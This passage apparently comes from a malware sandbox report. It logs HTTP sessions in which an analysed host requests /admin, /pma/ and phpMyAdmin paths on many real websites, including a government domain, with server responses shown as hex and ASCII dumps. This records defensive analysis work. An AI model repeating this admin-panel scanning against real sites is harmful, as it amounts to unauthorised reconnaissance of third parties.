                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                404192.168.2.66297264.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.222122908 CET164OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.431880951 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                405192.168.2.663055103.224.182.21080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.225404978 CET173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.384603977 CET341INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131767.1194278; expires=Thu, 02-Feb-2034 11:16:07 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/pma/?sub1=20240205-2216-0720-8b5f-fc43330f6951
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                406192.168.2.662973195.248.251.10380
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.227477074 CET176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: phonandroid.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.440109968 CET222INHTTP/1.1 301 Permanently moved
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                X-Varnish: 7031829
                                                                                                                                                                                                                                                                                                                                                                X-Redirected-By: lxc-varnish-ressources-02
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.phonandroid.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                407192.168.2.662723103.90.225.7080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.229553938 CET175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ngoalongvn.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.594291925 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.594326973 CET119INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                408192.168.2.66297977.240.114.21280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.236495018 CET173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mw.redsa.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.454312086 CET437INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Location: https://mw.redsa.net/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 240
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 77 2e 72 65 64 73 61 2e 6e 65 74 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mw.redsa.net/phpMyAdmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                409192.168.2.66307354.183.63.24180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.238615990 CET177OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426074982 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: lojRQpAHBg
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 33 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f ed 91 90 01 7c 18 11 1d 73 0e 9f 2d 12 91 02 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 123d;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo|s-|
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426117897 CET1286INData Raw: 18 11 3d 20 bc b7 4d 49 a4 00 1f 46 c4 6e 67 0e 9f 2d 12 91 02 7c 18 11 03 90 de 60 9b ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 89 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0 fb b0 57 42 9f f5 fd 3e 04 0c fb f3 61 bf 84 5e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: = MIFng-|`HV")3_9y79I>CWB>a^|[4tb9=y@`wT]YEs_u)2t1IRK-"P%+Xd<|u-V:i8+#.<pD-D}G#}V,-.%FhN`Glm?7
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426172018 CET1286INData Raw: 37 5c cf 00 34 9a 92 d7 1f 75 87 93 e1 d1 51 e3 41 db 91 74 7d 33 5f bb 1a fe 37 55 a2 f7 74 aa cd 01 bb 6a da 5a e0 06 6e ef 09 5b a9 e3 7e 08 52 cd 15 5d b3 33 39 de 3b 6d 97 31 5d c3 56 8b 5f 8b 65 11 b6 62 3f 9f 0b 7b 64 16 3a 3f 19 07 46 ba
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7\4uQAt}3_7UtjZn[~R]39;m1]V_eb?{d:?FwVo?'y<&=G^1b$#F:mgIIbe8T^xQMaiPa@&_uvw:kul5g]#}K`wiCQoh}Mh{89w c!gb
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426211119 CET1286INData Raw: f2 f4 8b c5 74 23 bd 83 76 80 1c e5 d7 dd 60 1b 70 ed a4 97 b4 88 da 5d 41 15 36 d5 23 a9 c1 3c c7 bb ca a7 c5 6c aa 2f 37 64 b0 4b c0 0a ed 50 d3 b2 bb 64 2b 33 d3 9d 36 73 b4 c2 ce 09 a7 78 0e 54 53 40 03 8b b5 b2 18 0e 36 c9 06 8d 2f e2 42 5e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t#v`p]A6#<l/7dKPd+36sxTS@6/B^H/@:kM\2Aoa)Y=]h^F:^tmCz: T P6pb8fQB"0VN".C`s<KyX`Dq,?
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426244974 CET281INData Raw: 83 e9 e1 b6 ad 4e 61 34 30 ed 5c bc c0 d7 25 7f f6 e4 45 c7 c4 7f f2 70 5c 6d 3c 09 13 28 20 b6 1c d3 2f b9 85 91 ea 14 9d 78 ba 9d 98 5b f2 a3 42 81 27 a8 cb e4 0d 6c 8e 23 61 b6 d3 12 ef 9c 4d 13 d8 c1 40 82 df b2 20 af 28 be 99 03 99 a9 c6 b7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Na40\%Ep\m<( /x[B'l#aM@ (jl\&]B!uWz'S>Qc_,9+-n}:(ez^00^EY}_~^{vsHKH]j(.N7[k0"5*|Dx
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.426278114 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                410192.168.2.662962177.74.1.15780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.243396997 CET179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sistemas.pa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.487854958 CET116INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://sistemas.pa.gov.br/phpmyadmin/


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                411192.168.2.663129104.21.14.24580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.243447065 CET168OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.371228933 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:16:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2xtjoY%2Bq6xVLdfqYqsmnDYxYp8SBSIYWvjLVaMgEtPOaG0I%2B9KfzttJbnHyOnKHyPtD5vvqHIUSRYDLYghBFfklgCocaRML8bWJXNa%2FObp8bhVqxhB97hoeF13wXHh2YA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd499f1b677b-ATL
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
